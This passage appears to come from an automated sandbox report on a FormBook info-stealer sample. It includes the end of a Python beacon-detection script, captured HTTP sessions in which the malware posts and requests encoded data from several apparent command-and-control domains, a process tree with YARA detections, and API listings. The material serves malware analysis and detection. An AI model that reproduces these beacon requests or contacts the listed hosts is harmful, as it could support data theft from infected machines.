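    flagged = []
    for raw in raw_requests:
        req = parse_http_request(raw)
        if is_beacon(req):
            flagged.append((raw.split("\r\n", 1)[0], beacon_indicators(req)))
    return flagged


if __name__ == "__main__":
    for start_line, hits in scan([SAMPLE_POST, SAMPLE_GET, BENIGN_GET]):
        print(start_line[:40], hits)
```

The scorer deliberately keys on the body/query shape rather than on the two hostnames or IPs, since those change per campaign while the request construction does not; the 404 replies seen here are not used as a signal because a live C2 can answer 200 just as easily. Feed `scan()` the reassembled request text from your own proxy or packet capture and review any hit against the full session before blocking.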

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.10 | 51558 | 154.23.178.231 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:54.601946115 CET | 1775 | OUT | POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.10  51559        154.23.178.231  80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:26:57.139301062 CET  484                OUT        GET /p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    Host: www.43kdd.top
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:26:58.019992113 CET  312                IN         HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 02:26:57 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: close
    ETag: "67811756-94"
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.10  51560        208.91.197.39   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:27:03.305949926 CET  738                OUT        POST /hxi5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 191
    Connection: close
    Host: www.jcsa.info
    Origin: http://www.jcsa.info
    Referer: http://www.jcsa.info/hxi5/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Ascii: 6n=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6T0ksG9DfmgqENf/Yalg7Huy7VsE5


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.10  51561        208.91.197.39   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:27:05.850543022 CET  762                OUT        POST /hxi5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 215
    Connection: close
    Host: www.jcsa.info
    Origin: http://www.jcsa.info
    Referer: http://www.jcsa.info/hxi5/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Ascii: 6n=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZu1bqxTPiGPZJoNTiE7gkO6468PYQ==


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.10  51562        208.91.197.39   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:27:08.421325922 CET  1775               OUT        POST /hxi5/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1227
    Connection: close
    Host: www.jcsa.info
    Origin: http://www.jcsa.info
    Referer: http://www.jcsa.info/hxi5/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.10  51563        208.91.197.39   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:27:10.967158079 CET  484                OUT        GET /hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    Host: www.jcsa.info
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:27:12.561743975 CET  1236               IN         HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:27:11 GMT
    Server: Apache
    Referrer-Policy: no-referrer-when-downgrade
    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
    Set-Cookie: vsid=901vr484108031203534161; expires=Thu, 10-Jan-2030 02:27:11 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CiYxcRbiigQANs0PAjR1CVOzwgfJyr99DXqjoobNtoDt27jMP2Qkn86y6/sRZDbYDydSvZJkx9p6rnuRz9TiZw==
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Data Ascii: abc1<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.10  51564        43.205.198.29   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 03:27:17.985789061 CET  765                OUT        POST /j8pv/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 191
    Connection: close
    Host: www.1secondlending.one
    Origin: http://www.1secondlending.one
    Referer: http://www.1secondlending.one/j8pv/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8ffsPSbxupvJHF1ZmDFdZPIIK7tAhYP
Jan 11, 2025 03:27:18.812952042 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:27:18 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 38 | Source IP: 192.168.2.10 | Source Port: 51565 | Destination IP: 43.205.198.29 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:20.534059048 CET | 789 | OUT | POST /j8pv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.1secondlending.one
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/j8pv/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb9njOntl1Beon5M2CEbZgFj3T8NhRA==
Jan 11, 2025 03:27:21.365241051 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:27:21 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 39 | Source IP: 192.168.2.10 | Source Port: 51566 | Destination IP: 43.205.198.29 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:23.080753088 CET | 1802 | OUT | POST /j8pv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.1secondlending.one
Origin: http://www.1secondlending.one
Referer: http://www.1secondlending.one/j8pv/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n= [TRUNCATED]
Jan 11, 2025 03:27:23.923000097 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:27:23 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 40 | Source IP: 192.168.2.10 | Source Port: 51567 | Destination IP: 43.205.198.29 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:25.625957012 CET | 493 | OUT | GET /j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.1secondlending.one
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:27:26.532979012 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:27:26 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 41 | Source IP: 192.168.2.10 | Source Port: 51568 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:31.591665983 CET | 750 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY58sCbkspZ2rUETikZ9/0Z7K3Czpxf


Session ID: 42 | Source IP: 192.168.2.10 | Source Port: 51569 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:34.177995920 CET | 774 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo9rM9vE1kzCKnxb6F+HHAFyRcDhXbg==


Session ID: 43 | Source IP: 192.168.2.10 | Source Port: 51570 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:36.788934946 CET | 1787 | OUT | POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n= [TRUNCATED]


Session ID: 44 | Source IP: 192.168.2.10 | Source Port: 51571 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:27:39.330887079 CET | 488 | OUT | GET /swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.zkdamdjj.shop
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36



                                                                                                              Target ID:0
                                                                                                              Start time:21:23:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x730000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:21:23:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x240000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:21:23:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x890000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:21:24:10
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"
                                                                                                              Imagebase:0x350000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:7
                                                                                                              Start time:21:24:12
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                              Imagebase:0xa20000
                                                                                                              File size:32'768 bytes
                                                                                                              MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:8
                                                                                                              Start time:21:24:26
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"
                                                                                                              Imagebase:0x350000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:10
                                                                                                              Start time:21:24:39
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                              Imagebase:0x7ff613480000
                                                                                                              File size:676'768 bytes
                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.3%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:325
                                                                                                                Total number of Limit Nodes:25

                                                                                                                Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0296D646
• GetCurrentThread.KERNEL32 ref: 0296D683
• GetCurrentProcess.KERNEL32 ref: 0296D6C0
• GetCurrentThreadId.KERNEL32 ref: 0296D719
Memory Dump Source
• Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0296D646
• GetCurrentThread.KERNEL32 ref: 0296D683
• GetCurrentProcess.KERNEL32 ref: 0296D6C0
• GetCurrentThreadId.KERNEL32 ref: 0296D719
Memory Dump Source
• Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071DDF8E
Memory Dump Source
• Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

Control-flow Graph

APIs
